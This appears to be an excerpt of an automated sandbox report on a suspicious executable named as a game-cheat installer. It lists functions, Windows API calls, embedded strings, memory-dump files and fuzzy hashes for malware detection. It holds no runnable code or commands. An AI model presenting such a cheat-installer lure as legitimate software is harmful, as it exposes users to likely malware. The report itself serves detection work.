                                                                                                  • Instruction ID: 381222e7e1d4b07565498eb521d67cef181f4d2581a2ee718292eb4198c0ebb8
                                                                                                  • Opcode Fuzzy Hash: 47dbf0decc8272d9a7ae459b130201949f9107b8ec80fb87a20ec63cf3da1f82
                                                                                                  • Instruction Fuzzy Hash: 2141AD62F14B5284FF00DFAAE8541AC2372BF44BA9B009235DEDDA7A99EF38D451D240
                                                                                                  Function 00007FF6C16F0B78 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6C16EC45B), ref: 00007FF6C16F0B91
                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6C16EC45B), ref: 00007FF6C16F0BF3
                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6C16EC45B), ref: 00007FF6C16F0C2D
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6C16EC45B), ref: 00007FF6C16F0C57
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                  • String ID:
                                                                                                  • API String ID: 1557788787-0
                                                                                                  • Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                                  • Instruction ID: 14b125a633ac9db461b77a7a0bdf1a2fd24671d68e08272682a0073d059869de
                                                                                                  • Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                                  • Instruction Fuzzy Hash: 1E218731F18B5581E7249F13A44022976A5FF98BD1B484135DEEEA3BA4DF3CE4529304
                                                                                                  Function 00007FF6C16ED440 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$abort
                                                                                                  • String ID:
                                                                                                  • API String ID: 1447195878-0
                                                                                                  • Opcode ID: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                                                                  • Instruction ID: 2ef3a83adf2da84c4e2640ab269fa0c0e3b8dc3cab8d1bd4b13168b51d76d8b9
                                                                                                  • Opcode Fuzzy Hash: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                                                                  • Instruction Fuzzy Hash: 23019214B0964282FB58AF33ED5527C11915F547D2F044678E9EEC77D6ED2CFA05A280
                                                                                                  Function 00007FF6C16D8590 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CapsDevice$Release
                                                                                                  • String ID:
                                                                                                  • API String ID: 1035833867-0
                                                                                                  • Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                                                  • Instruction ID: af6db2887e4ff33ddf63801c0ae997c8bf1dba87ea396c9827e9bce9570b7a28
                                                                                                  • Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                                                  • Instruction Fuzzy Hash: F6E0ED60E09A0682FF095F7368791366191AF48743F288439D89E86351DD3CE1958620
                                                                                                  Function 00007FF6C16BE34C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                  • String ID: DXGIDebug.dll
                                                                                                  • API String ID: 3668304517-540382549
                                                                                                  • Opcode ID: 2b89549b7426e50bfd34945384ed8c0e8b0bf6c6c1231d7991053c614d04a2bf
                                                                                                  • Instruction ID: fc02070dbb220a5932aef40cf75057419ffe7b7a545b21ecd8a681e3a3dc5ace
                                                                                                  • Opcode Fuzzy Hash: 2b89549b7426e50bfd34945384ed8c0e8b0bf6c6c1231d7991053c614d04a2bf
                                                                                                  • Instruction Fuzzy Hash: A571CC72A14B8186EB14CF26E8403ADB3A9FB54798F004236DBEC47B99DF78E161D340
                                                                                                  Function 00007FF6C16EE1F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                  • String ID: e+000$gfff
                                                                                                  • API String ID: 3215553584-3030954782
                                                                                                  • Opcode ID: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                                                  • Instruction ID: 83c48b3f29f8e01a63c9cfddc356c1e1066aad857b956867a26acdcb9fc17fbf
                                                                                                  • Opcode Fuzzy Hash: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                                                  • Instruction Fuzzy Hash: E251E262B187C18AE7258F369D413697B91AB81B91F089331CAEC87BDACF2CD5449740
                                                                                                  Function 00007FF6C16C9408 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                                  • String ID: SIZE
                                                                                                  • API String ID: 449872665-3243624926
                                                                                                  • Opcode ID: 1ee6a6b9fbbd6c3126f8bc5ffec1b6aa008f2877db1f13591811bbd6ed408201
                                                                                                  • Instruction ID: 265ea5f837d0749f15288790e5f6f7d5fc79bd4d94b64237fca2a193ebb0827f
                                                                                                  • Opcode Fuzzy Hash: 1ee6a6b9fbbd6c3126f8bc5ffec1b6aa008f2877db1f13591811bbd6ed408201
                                                                                                  • Instruction Fuzzy Hash: EA41D462A2878285EF10EF26E4513BD6350EF95792F908331EADF826D6EE7CD640D740
                                                                                                  Function 00007FF6C16EC2C0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe, xrefs: 00007FF6C16EC2F9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
                                                                                                  • API String ID: 3307058713-368138684
                                                                                                  • Opcode ID: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                                                                  • Instruction ID: 3a74ffa33b63f9533bfd14a19f462e33a8fc5448c29410ce72b4ad2ec6f7be6e
                                                                                                  • Opcode Fuzzy Hash: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                                                                  • Instruction Fuzzy Hash: 9F41B032A08A528AEB14DF27EC500BC7794EF847C9B544132E9CE87B85DE3DE641D390
                                                                                                  Function 00007FF6C16D9B40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Item$Text$Dialog
                                                                                                  • String ID: ASKNEXTVOL
                                                                                                  • API String ID: 2638039312-3402441367
                                                                                                  • Opcode ID: 75a4ef6a6cdb84fc8c98b7401f85638b76a9530d4b428818baa7d4c6ec3066de
                                                                                                  • Instruction ID: e937699db489c2f69e08e1c25fdfed37749f547c948f2d297f7b71a4a4e8db0b
                                                                                                  • Opcode Fuzzy Hash: 75a4ef6a6cdb84fc8c98b7401f85638b76a9530d4b428818baa7d4c6ec3066de
                                                                                                  • Instruction Fuzzy Hash: 6E41A322A1C68281FB10AF17E4542BA23A1AF86BC6F640035DECE87796DF3CE545E350
                                                                                                  Function 00007FF6C16C9638 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide_snwprintf
                                                                                                  • String ID: $%s$@%s
                                                                                                  • API String ID: 2650857296-834177443
                                                                                                  • Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                                                                  • Instruction ID: ecc49b75697e6d2d894b08a88c36bedc362b36dffebb565bd0826b51d7a05146
                                                                                                  • Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                                                                  • Instruction Fuzzy Hash: 5B31DC72B19A8686EF10EF67E4502E923A0EB44B85F401036EECE87795EE3DE505D740
                                                                                                  Function 00007FF6C16EEB04 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileHandleType
                                                                                                  • String ID: @
                                                                                                  • API String ID: 3000768030-2766056989
                                                                                                  • Opcode ID: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                                                                  • Instruction ID: 8466bdd918367cda9b0f8ee14b013c2090e90caa0402bb0bf76b931d93a240cc
                                                                                                  • Opcode Fuzzy Hash: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                                                                  • Instruction Fuzzy Hash: 8221A522A08B8242EF608F2699901393A55EF45775F280335D6EF877D4CF3DD981E391
                                                                                                  Function 00007FF6C16E4078 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C16E1D3E), ref: 00007FF6C16E40BC
                                                                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C16E1D3E), ref: 00007FF6C16E4102
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                  • String ID: csm
                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                  • Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                                                                  • Instruction ID: a0307f18d821ef5e50712edc9f4d108873cdbcb6c914f268c0173b5ea03c320e
                                                                                                  • Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                                                                  • Instruction Fuzzy Hash: D3114F32608B4182EB208F26E8402697BE5FB88B95F184231DFCD47768DF3CD665CB40
                                                                                                  Function 00007FF6C16CEA5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C16CE95F,?,?,?,00007FF6C16C463A,?,?,?), ref: 00007FF6C16CEA63
                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C16CE95F,?,?,?,00007FF6C16C463A,?,?,?), ref: 00007FF6C16CEA6E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastObjectSingleWait
                                                                                                  • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                                  • API String ID: 1211598281-2248577382
                                                                                                  • Opcode ID: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                                                                  • Instruction ID: dde8962b22f5da7aab26da9d40493f1678d854f9fdf6ac0a8134a033d57d8319
                                                                                                  • Opcode Fuzzy Hash: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                                                                  • Instruction Fuzzy Hash: C7E04F21E1980281FB00AF379C569B822117F64772FA00330E4FEC15F1AF2CE959E300
                                                                                                  Function 00007FF6C16CA43C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1267073404.00007FF6C16B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C16B0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1267036357.00007FF6C16B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267113868.00007FF6C16F8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C170B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267138552.00007FF6C1714000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1267257764.00007FF6C171E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff6c16b0000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FindHandleModuleResource
                                                                                                  • String ID: RTL
                                                                                                  • API String ID: 3537982541-834975271
                                                                                                  • Opcode ID: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                                                  • Instruction ID: db3a7d4b7b6d9b40bc935cec8a03e2d12778f6ad0941f3bc3f09cb9e2faedcf2
                                                                                                  • Opcode Fuzzy Hash: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                                                  • Instruction Fuzzy Hash: E1D05E91F0960282FF199F73A44933412545F19B83F488078C8DE86390EE2CD098D754